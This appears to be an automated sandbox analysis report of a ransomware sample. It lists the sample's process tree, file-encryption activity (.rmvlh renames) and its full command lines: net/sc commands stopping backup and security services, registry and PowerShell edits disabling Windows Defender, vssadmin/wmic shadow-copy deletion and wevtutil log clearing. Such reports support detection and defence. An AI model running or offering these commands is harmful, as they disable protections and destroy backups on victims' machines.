Description Indicator Process Target
PID 1352 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1656 wrote to memory of 1060 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1656 wrote to memory of 1060 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1656 wrote to memory of 1060 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1656 wrote to memory of 1060 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1352 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 560 wrote to memory of 568 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 560 wrote to memory of 568 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 560 wrote to memory of 568 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 560 wrote to memory of 568 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1352 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1092 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1092 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1092 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1092 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1352 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1836 wrote to memory of 1604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1836 wrote to memory of 1604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1836 wrote to memory of 1604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1836 wrote to memory of 1604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1352 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1792 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1792 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1792 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1792 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1352 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 744 wrote to memory of 1752 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 744 wrote to memory of 1752 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 744 wrote to memory of 1752 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 744 wrote to memory of 1752 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1352 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 964 wrote to memory of 1532 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 964 wrote to memory of 1532 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 964 wrote to memory of 1532 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 964 wrote to memory of 1532 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1352 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1352 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/1656-54-0x0000000000000000-mapping.dmp

memory/1060-55-0x0000000000000000-mapping.dmp

memory/560-56-0x0000000000000000-mapping.dmp

memory/568-57-0x0000000000000000-mapping.dmp

memory/1092-58-0x0000000000000000-mapping.dmp

memory/888-59-0x0000000000000000-mapping.dmp

memory/1836-60-0x0000000000000000-mapping.dmp

memory/1604-61-0x0000000000000000-mapping.dmp

memory/1792-62-0x0000000000000000-mapping.dmp

memory/432-63-0x0000000000000000-mapping.dmp

memory/744-64-0x0000000000000000-mapping.dmp

memory/1752-65-0x0000000000000000-mapping.dmp

memory/964-66-0x0000000000000000-mapping.dmp

memory/1532-67-0x0000000000000000-mapping.dmp

memory/1928-68-0x0000000000000000-mapping.dmp

memory/1812-69-0x0000000000000000-mapping.dmp

memory/1124-70-0x0000000000000000-mapping.dmp

memory/1364-71-0x0000000000000000-mapping.dmp

memory/1944-72-0x0000000000000000-mapping.dmp

memory/1668-73-0x0000000000000000-mapping.dmp

memory/1744-74-0x0000000000000000-mapping.dmp

memory/1932-75-0x0000000000000000-mapping.dmp

memory/1824-76-0x0000000000000000-mapping.dmp

memory/1400-77-0x0000000000000000-mapping.dmp

memory/900-78-0x0000000000000000-mapping.dmp

memory/2028-79-0x0000000000000000-mapping.dmp

memory/1588-80-0x0000000000000000-mapping.dmp

memory/2032-81-0x0000000000000000-mapping.dmp

memory/2036-82-0x0000000000000000-mapping.dmp

memory/1736-83-0x0000000000000000-mapping.dmp

memory/888-84-0x0000000000000000-mapping.dmp

memory/1652-85-0x0000000000000000-mapping.dmp

memory/844-86-0x0000000000000000-mapping.dmp

memory/968-87-0x0000000000000000-mapping.dmp

memory/1136-88-0x0000000000000000-mapping.dmp

memory/976-89-0x0000000000000000-mapping.dmp

memory/1200-90-0x0000000000000000-mapping.dmp

memory/2044-91-0x0000000000000000-mapping.dmp

memory/1680-92-0x0000000000000000-mapping.dmp

memory/1980-93-0x0000000000000000-mapping.dmp

memory/1952-94-0x0000000000000000-mapping.dmp

memory/1628-95-0x0000000000000000-mapping.dmp

memory/860-96-0x0000000000000000-mapping.dmp

memory/1172-97-0x0000000000000000-mapping.dmp

memory/1672-98-0x0000000000000000-mapping.dmp

memory/568-99-0x0000000000000000-mapping.dmp

memory/1408-100-0x0000000000000000-mapping.dmp

memory/624-101-0x0000000000000000-mapping.dmp

memory/740-102-0x0000000000000000-mapping.dmp

memory/1064-103-0x0000000000000000-mapping.dmp

memory/960-104-0x0000000000000000-mapping.dmp

memory/984-105-0x0000000000000000-mapping.dmp

memory/1344-106-0x0000000000000000-mapping.dmp

memory/868-107-0x0000000000000000-mapping.dmp

memory/1000-108-0x0000000000000000-mapping.dmp

memory/1244-109-0x0000000000000000-mapping.dmp

memory/1060-110-0x0000000000000000-mapping.dmp

memory/772-111-0x0000000000000000-mapping.dmp

memory/1284-112-0x0000000000000000-mapping.dmp

memory/1256-113-0x0000000000000000-mapping.dmp

memory/1716-114-0x0000000000000000-mapping.dmp

memory/896-115-0x0000000000000000-mapping.dmp

memory/520-116-0x0000000000000000-mapping.dmp

memory/280-117-0x0000000000000000-mapping.dmp

memory/1444-118-0x0000000075CE1000-0x0000000075CE3000-memory.dmp

memory/1444-119-0x00000000024A0000-0x00000000030EA000-memory.dmp

memory/1444-120-0x00000000024A0000-0x00000000030EA000-memory.dmp

memory/1444-121-0x00000000024A0000-0x00000000030EA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 30d83649de7ecd51dbbfcca01a5ead2e
SHA1 bd3270bca38851ccb82d91ffc3bc4466d21a8962
SHA256 8945229a0291fc15b6a92e26991c1b8820886b041e433bc102764d5d8d2bcfb1
SHA512 41fdb29361d5f30f0a29dac871539738b8984f5b090b422471a58a3e9fe9b1b1c571885ac09167d7133f7f3e4f6191a9df5fd4b15128c3bee372a28d0c91f2e5

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 11:09

Reported

2022-01-13 11:15

Platform

win10-en-20211208

Max time kernel

110s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_BfcFJ60wSfE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XB5kDCSpuh00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_SHD8Ga0cK1A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_iUcjNoPdyeE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\msador28.tlb C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Z0kzsJ1HtO40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_urqyWfJBd0E0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VpeGcDRx_600.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xBqcQlci4kU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fhU_Z6zugZM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VNw5g3Qbr1U0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UMSBdz8Ts9k0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wQN5AI0iNYw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\Welcome.html.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_pPwk5yAlVgA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gO-pvtuqATU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
